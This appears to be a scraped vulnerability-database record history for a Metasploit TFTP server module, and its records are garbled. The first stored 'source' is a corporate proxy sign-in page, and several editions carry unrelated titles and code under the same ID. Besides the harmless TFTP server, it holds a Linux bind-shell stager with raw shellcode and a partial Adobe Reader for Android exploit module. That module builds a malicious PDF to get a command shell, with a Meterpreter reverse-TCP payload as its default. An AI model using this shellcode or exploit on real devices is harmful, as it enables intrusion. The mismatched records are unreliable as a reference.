name=\"uform\" method=\"post\" action=\"https://login.zscalerone.net:443/sfc__lu\" id=\"uform\"><table class=\"table-company-logo\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tr><td class=\"bh bh-scaled\"><span id=\"cmpy_info\">tuxguy.org</span></td></tr></table><input type=\"hidden\" name=\"urlosfc\" size=\"25\" value=\"origurl=https://raw.githubusercontent.com/rapid7/metasploit-framework/master//modules/auxiliary/server/tftp.rb&wexps=1&_ordtok=MKW3WV347sWMDkvDSf1JfMtTrH&wexps=1\"><input type=\"hidden\" name=\"urlodmn\" size=\"25\" value=\"https://raw.githubusercontent.com/rapid7/metasploit-framework/master//modules/auxiliary/server/tftp.rb\"><input type=\"hidden\" name=\"jscript\" size=\"4\" value=\"0set\"><table class=\"m_tbl\" cellpadding=\"0\" cellspacing=\"0\" align=\"center\"><tbody><tr><td valign=\"top\"><table class=\"table-upper\" width=\"100%\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"left\" class=\"eu_h\"><img class=\"act-icon\"src=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAYAAACNiR0NAAABMklEQVR4nK3UvytFYRzH8RcpKUrEIP4ApRQZ/EjJJMpgltSVbsqsJP+DQcSosBgNLDYWGSyKBQObLGLBcM7Rudd57uXyns5znud5f7/POZ9z+Geqkov+7Y6s+WbMoxfPOMEO3osXnubuQU2JYoM4QGvq3izmMBEX+EZ1QNaIvSJZwhDWQl2EhONoD23CNBp+I+wqISN69p2/EV6XEQbXhISHeCohC86HhI+iN/qaMXeDXKhSsbAFG7hCHwawhQtRBlcxhU2cY1EqyxTmsBbH6I7Hy8hjNxbUxwVWU430xE2sZAlnUrKEJiyEjhezhHU8UHjkyTIbQ9RgLBmkhSMVCmE0S1j3B2FblvAvfH2GaWGpIJfjMkuYx1sFsjtRlFAYm32cYVj0Yy3HB25xhJcKGvkZn2rqLv61XgGbAAAAAElFTkSuQmCC\">Sign In</td></tr><tr><td align=\"left\" class=\"eu_sh\">To keep you safe from internet threats, please sign in to your company's security service.<hr></td></tr><tr><td class=\"eu_co\"><table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"left\" width=\"100%\" style=\"width:100%;\"><div class=\"table-half-column-fixed\"><table width=\"100%\" class=\"table-field-label\" cellspacing=\"0\"cellpadding=\"0\"><tr><td align=\"left\" class=\"td-field-label\">User Name</td></tr></table><table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"class=\"table-field-input\"><tr><td style=\"position: relative;\"><div class=\"input-wrapper\"><input id=\"username_input\" class=\"input username_input\" name=\"lognsfc\" value=\"\" type=\"text\" autofocus=\"true\"><label id=\"username_placeholder\" class=\"username_placeholder\" for=\"username_input\">Enter your User Name...</label></div></td></tr></table></div></td></tr></tbody></table></td></tr><tr><td class=\"eu_co\"><table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tr><td align=\"left\" id=\"error-text\" class=\"eu_h sm not\" style=\"display: none;\"></td></tr></table></td></tr><tr><td class=\"eu_co\" class=\"bsubmit\" align=\"left\"><table cellspacing=\"0\" cellpadding=\"0\" width=\"100%\"><tbody><tr><td width=\"50%\" style=\"width: 50%;\" align=\"left\"><input type=\"submit\" name=\"lsubmit\" class=\"btn\" value=\"Sign In\"onclick=\"return validate(this.form);\"></td><td width=\"50%\" style=\"width: 50%;\" align=\"right\"></td></tr></tbody></table></td></tr></tbody></table><table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" class=\"table-lower\"><tr><td class=\"eu_co fo\" align=\"left\">Need help? Contact our support team at +91-9000000000 <span class=\"separator\"></span><a href=\"mailto:support@tuxguy.org\">support@tuxguy.org</a>.</td><td class=\"eu_co\"></td></tr></table></td></tr></tbody></table><table class=\"table-company-logo\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td></td></tr></tbody></table></form></div></div></div><script language=\"Javascript\" type=\"text/javascript\">if (document.forms && document.forms[0] && document.forms[0].jscript) {document.forms[0].jscript.value = \"1set\";}var placeholder = document.getElementById('username_placeholder');var input_field = document.getElementsByName('lognsfc')[0];var userNamePlaceHolderText = 'Enter your User Name...';placeholder.innerHTML = userNamePlaceHolderText;placeholder.style.zIndex = 100;if (window.attachEvent) {input_field.attachEvent('onkeyup', function(e) {if (!e.srcElement.value) {placeholder.innerHTML = userNamePlaceHolderText;placeholder.style.zIndex = 100;}else {placeholder.innerHTML = '';placeholder.style.zIndex = 0;}});}else {input_field.addEventListener('keyup', function(e) {if (!e.target.value) {placeholder.innerHTML = userNamePlaceHolderText;placeholder.style.zIndex = 100;}else {placeholder.innerHTML = '';placeholder.style.zIndex = 0;}});}setTimeout(function() {var companyLogoImgEl = document.getElementById(\"cmpy_info\");if (companyLogoImgEl) {var theImage = new Image();if(window.attachEvent) {theImage.src = companyLogoImgEl.src;companyLogoImgEl.attachEvent('onmouseover', function(e) {companyLogoImgEl.style.msTransform = \"scale(2)\";});companyLogoImgEl.attachEvent('onmouseout', function(e) {companyLogoImgEl.style.msTransform = \"scale(1)\";});}else if(window.addEventListener){theImage.src = companyLogoImgEl.src;companyLogoImgEl.addEventListener('mouseover', function(e) {companyLogoImgEl.style.transform = \"scale(2)\";});companyLogoImgEl.addEventListener('mouseout', function(e) {companyLogoImgEl.style.transform = \"scale(1)\";});}}}, 200);</script></body></html>", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-07T18:02:59", "differentElements": ["sourceData"], "edition": 23}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "de71383e686baf40dc661000113b42a5", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service\n", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-07T23:53:35", "history": [], "viewCount": 44, "enchantments": {"score": {"value": 3.5, "vector": "NONE", "modified": "2019-07-07T23:53:35"}, "dependencies": {"references": [{"type": "debian", "idList": ["DEBIAN:DLA-1847-1:2B931", "DEBIAN:DLA-1844-1:DE689"]}, {"type": "zdt", "idList": ["1337DAY-ID-32957", "1337DAY-ID-32954", "1337DAY-ID-32955"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994902"]}, {"type": "cve", "idList": ["CVE-2019-10639", "CVE-2018-14733", "CVE-2019-1890", "CVE-2019-1886", "CVE-2018-20850"]}, {"type": "threatpost", "idList": ["THREATPOST:877715F6B7B3157A0BB04907D85EE1F6"]}, {"type": "kitploit", "idList": ["KITPLOIT:6269408450657572101", "KITPLOIT:2549439882250233553"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891844"]}, {"type": "exploitdb", "idList": ["EDB-ID:47076"]}, {"type": "securelist", "idList": ["SECURELIST:9A6AC9776541651616898893ADB1716A"]}, {"type": "thn", "idList": ["THN:4D88AC2FA8EC904F3CE016D6C763499C"]}, {"type": "ubuntu", "idList": ["USN-4038-4", "USN-4038-3"]}], "modified": "2019-07-07T23:53:35"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-07T23:53:35", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 24}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "79907abbd98e8598af47f817eec26a1d", "type": "metasploit", "bulletinFamily": "exploit", "title": "Linux Command Shell, Bind TCP Stager", "description": "Spawn a command shell (staged). Listen for a connection\n", "published": "2012-09-13T20:15:38", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-25T00:38:05", "history": [], "viewCount": 44, "enchantments": {"score": {"value": 1.5, "vector": "NONE", "modified": "2019-08-25T00:38:05"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:1999-1", "OPENSUSE-SU-2019:1989-1", "OPENSUSE-SU-2019:1988-1"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4508-1:2E656", "DEBIAN:DLA-1893-1:51DA6", "DEBIAN:DSA-4505-1:2F1F2"]}, {"type": "kitploit", "idList": ["KITPLOIT:4836041497147545184", "KITPLOIT:8965770478109825786", "KITPLOIT:3272262582020242324"]}, {"type": "mskb", "idList": ["KB4490495"]}, {"type": "schneier", "idList": ["SCHNEIER:A5722B37F55A9C1FB6B8985465D9EAAB"]}, {"type": "cve", "idList": ["CVE-2019-10751"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:8D07A3EB1218AA9C61CE095C89CEDE2C", "TRENDMICROBLOG:368E377D2C106DF8154135DC53D0A622"]}, {"type": "talosblog", "idList": ["TALOSBLOG:9F05FC6E227859F0165366CAA52DDB78"]}, {"type": "atlassian", "idList": ["ATLASSIAN:JRASERVER-69858"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154196", "PACKETSTORM:154197"]}, {"type": "exploitdb", "idList": ["EDB-ID:47301"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:D928490F94D371430E538BE5B28D833C"]}], "modified": "2019-08-25T00:38:05"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\n\n\n###\n#\n# BindTcp\n# -------\n#\n# Linux bind TCP stager.\n#\n###\nmodule MetasploitModule\n\n CachedSize = 63\n\n include Msf::Payload::Stager\n include Msf::Payload::Linux\n\n def self.handler_type_alias\n \"bind_nonx_tcp\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Bind TCP Stager',\n 'Description' => 'Listen for a connection',\n 'Author' => 'skape',\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::BindTcp,\n 'Stager' =>\n {\n 'Offsets' =>\n {\n 'LPORT' => [ 0x14, 'n' ],\n },\n 'Payload' =>\n \"\\x31\\xdb\\x53\\x43\\x53\\x6a\\x02\\x6a\\x66\\x58\\x99\\x89\\xe1\\xcd\\x80\\x96\" +\n \"\\x43\\x52\\x66\\x68\\xbf\\xbf\\x66\\x53\\x89\\xe1\\x6a\\x66\\x58\\x50\\x51\\x56\" +\n \"\\x89\\xe1\\xcd\\x80\\xb0\\x66\\xd1\\xe3\\xcd\\x80\\x52\\x52\\x56\\x43\\x89\\xe1\" +\n \"\\xb0\\x66\\xcd\\x80\\x93\\xb6\\x0c\\xb0\\x03\\xcd\\x80\\x89\\xdf\\xff\\xe1\"\n }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-25T00:38:05", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 25}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "de71383e686baf40dc661000113b42a5", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service\n", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-25T03:02:11", "history": [], "viewCount": 44, "enchantments": {"score": {"value": 1.2, "vector": "NONE", "modified": "2019-08-25T03:02:11"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:1999-1", "OPENSUSE-SU-2019:1989-1", "OPENSUSE-SU-2019:1988-1"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4508-1:2E656", "DEBIAN:DLA-1893-1:51DA6", "DEBIAN:DSA-4505-1:2F1F2"]}, {"type": "kitploit", "idList": ["KITPLOIT:4836041497147545184", "KITPLOIT:8965770478109825786", "KITPLOIT:3272262582020242324"]}, {"type": "mskb", "idList": ["KB4490495"]}, {"type": "schneier", "idList": ["SCHNEIER:A5722B37F55A9C1FB6B8985465D9EAAB"]}, {"type": "cve", "idList": ["CVE-2019-10751"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:8D07A3EB1218AA9C61CE095C89CEDE2C", "TRENDMICROBLOG:368E377D2C106DF8154135DC53D0A622"]}, {"type": "talosblog", "idList": ["TALOSBLOG:9F05FC6E227859F0165366CAA52DDB78"]}, {"type": "atlassian", "idList": ["ATLASSIAN:JRASERVER-69858"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154196", "PACKETSTORM:154197"]}, {"type": "exploitdb", "idList": ["EDB-ID:47301"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:D928490F94D371430E538BE5B28D833C"]}], "modified": "2019-08-25T03:02:11"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-25T03:02:11", "differentElements": ["modified", "published"], "edition": 26}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "0b947ee7951ab35799a0e49641135d17", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-28T14:15:39", "history": [], "viewCount": 44, "enchantments": {"score": {"value": 3.6, "vector": "NONE", "modified": "2019-08-28T14:15:39"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:E068C231265847BA99669A8EBF0D395D", "THREATPOST:855D1B9BE270C52F4F145172AE284D7C", "THREATPOST:C5BD5C9A6AF65457AB5AD88F2C0001DF", "THREATPOST:A4EB2C80D13E41D28E94FD4374EC976E"]}, {"type": "thn", "idList": ["THN:EA39A4315695FDB9B8D8CF4AE5CA1D8C", "THN:3C361B822E60D3E3F416FF52640D5522"]}, {"type": "exploitdb", "idList": ["EDB-ID:47310", "EDB-ID:47308"]}, {"type": "securelist", "idList": ["SECURELIST:5CDFA4B2F373B8F9BC67975A866F2CEA"]}, {"type": "cve", "idList": ["CVE-2019-13237", "CVE-2019-15642", "CVE-2019-15557", "CVE-2019-15637", "CVE-2019-14300"]}, {"type": "talosblog", "idList": ["TALOSBLOG:62B868C1729207FF4ED156D86237FD03"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2017-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704509", "OPENVAS:1361412562310704508"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154232"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4509-1:D6C70"]}], "modified": "2019-08-28T14:15:39"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-28T14:15:39", "differentElements": ["modified", "published"], "edition": 27}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "de71383e686baf40dc661000113b42a5", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service\n", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-28T16:43:20", "history": [], "viewCount": 44, "enchantments": {"score": {"value": 3.6, "vector": "NONE", "modified": "2019-08-28T16:43:20"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:E068C231265847BA99669A8EBF0D395D", "THREATPOST:855D1B9BE270C52F4F145172AE284D7C", "THREATPOST:C5BD5C9A6AF65457AB5AD88F2C0001DF", "THREATPOST:A4EB2C80D13E41D28E94FD4374EC976E"]}, {"type": "thn", "idList": ["THN:EA39A4315695FDB9B8D8CF4AE5CA1D8C", "THN:3C361B822E60D3E3F416FF52640D5522"]}, {"type": "talosblog", "idList": ["TALOSBLOG:377EC1EB087DFE3FD1C7FE5926F2A13D", "TALOSBLOG:62B868C1729207FF4ED156D86237FD03"]}, {"type": "exploitdb", "idList": ["EDB-ID:47310", "EDB-ID:47308"]}, {"type": "securelist", "idList": ["SECURELIST:5CDFA4B2F373B8F9BC67975A866F2CEA"]}, {"type": "cve", "idList": ["CVE-2019-13237", "CVE-2019-15642", "CVE-2019-15557", "CVE-2019-15637"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2017-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704509", "OPENVAS:1361412562310704508"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154232"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4509-1:D6C70"]}], "modified": "2019-08-28T16:43:20"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-28T16:43:20", "differentElements": ["cvelist", "cvss", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 28}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "a0e9da8ae6880586f0b1e1ba11765c7d", "type": "metasploit", "bulletinFamily": "exploit", "title": "Adobe Reader for Android addJavascriptInterface Exploit", "description": "Adobe Reader versions less than 11.2.0 exposes insecure native interfaces to untrusted javascript in a PDF. This module embeds the browser exploit from android/webview_addjavascriptinterface into a PDF to get a command shell on vulnerable versions of Reader.\n", "published": "2014-05-31T20:48:24", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0514"], "cvelist": ["CVE-2014-0514"], "lastseen": "2019-09-11T04:46:54", "history": [], "viewCount": 44, "enchantments": {"score": {"value": 5.9, "vector": "NONE", "modified": "2019-09-11T04:46:54"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-0514"]}, {"type": "zdt", "idList": ["1337DAY-ID-22148", "1337DAY-ID-22336"]}, {"type": "thn", "idList": ["THN:A9CB8F0B48A3C138A85C57873DF6DB74"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13727"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:127113"]}, {"type": "exploitdb", "idList": ["EDB-ID:33791", "EDB-ID:32884"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/ANDROID/FILEFORMAT/ADOBE_READER_PDF_JS_INTERFACE"]}], "modified": "2019-09-11T04:46:54"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/fileformat'\nrequire 'msf/core/exploit/pdf'\nrequire 'msf/core/exploit/android'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::PDF\n include Msf::Exploit::Android\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe Reader for Android addJavascriptInterface Exploit',\n 'Description' => %q{\n Adobe Reader versions less than 11.2.0 exposes insecure native\n interfaces to untrusted javascript in a PDF. This module embeds the browser\n exploit from android/webview_addjavascriptinterface into a PDF to get a\n command shell on vulnerable versions of Reader.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Yorick Koster', # discoverer\n 'joev' # msf module\n ],\n 'References' =>\n [\n [ 'CVE', '2014-0514' ],\n [ 'EDB', '32884' ],\n [ 'OSVDB', '105781' ],\n ],\n 'Platform' => 'android',\n 'DefaultOptions' => {\n 'PAYLOAD' => 'android/meterpreter/reverse_tcp'\n },\n 'Targets' => [\n [ 'Android ARM', {\n 'Platform' => 'android',\n 'Arch' => ARCH_ARMLE\n }\n ],\n [ 'Android MIPSLE', {\n 'Platform' => 'android',\n 'Arch' => ARCH_MIPSLE\n }\n ],\n [ 'Android X86', {\n 'Platform' => 'android',\n 'Arch' => ARCH_X86\n }\n ]\n ],\n 'DisclosureDate' => 'Apr 13 2014',\n 'DefaultTarget' => 0\n ))\n\n register_options([\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),\n ])\n end\n\n def exploit\n print_status(\"Generating Javascript exploit...\")\n js = add_javascript_interface_exploit_js(ARCH_ARMLE)\n print_status(\"Creating PDF...\")\n file_create(pdf(js))\n end\n\n def trailer(root_obj)\n id = @xref.keys.max+1\n \"trailer\" << eol << \"<</Size %d/Root \" % id << io_ref(root_obj) << \">>\" << eol\n end\n\n def add_compressed(n, data)\n add_object(n, Zlib::Inflate.inflate(Rex::Text.decode_base64(data)))\n end\n\n def pdf(js)\n self.eol = \"\\x0d\"\n @xref = {}\n @pdf = header('1.6')\n\n add_compressed(25, \"eJzjtbHRd0wuynfLL8pVMDFQMFAI0vdNLUlMSSxJVDAGc/0Sc1OLFYyNwBz/0pKczDwg3xzMDUhMB7INzcCc4ILMlNQiz7y0fAUjiOrgkqLS5JKQotTUoPz8EgVDiPkhlQWp+s5AC3Ly0+3seAG6CSa9\")\n add_compressed(40, \"eJzjtbHRd3HU0PdIzSlTMFAISQMS6Qqa+i5BQAnXvOT8lMy8dCAzwMXNJT8ZJqBgYgpUF2Rnp++Wn1cClPZIdcpXMLYECUKMMjEHs6MSXZIUTCwgikHKM1NzUoqjjcEisXZ2vADEuSJw\")\n add_compressed(3, 